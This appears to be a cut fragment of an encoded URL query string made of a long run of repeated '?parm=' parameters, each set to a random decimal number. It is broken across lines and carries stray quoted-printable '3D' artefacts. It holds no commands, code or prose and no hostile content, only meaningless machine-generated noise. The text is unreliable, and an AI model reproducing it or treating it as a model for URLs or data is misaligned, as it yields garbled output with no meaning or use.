 rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=3D0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm
 =0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par
 m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=3D0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par
 m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697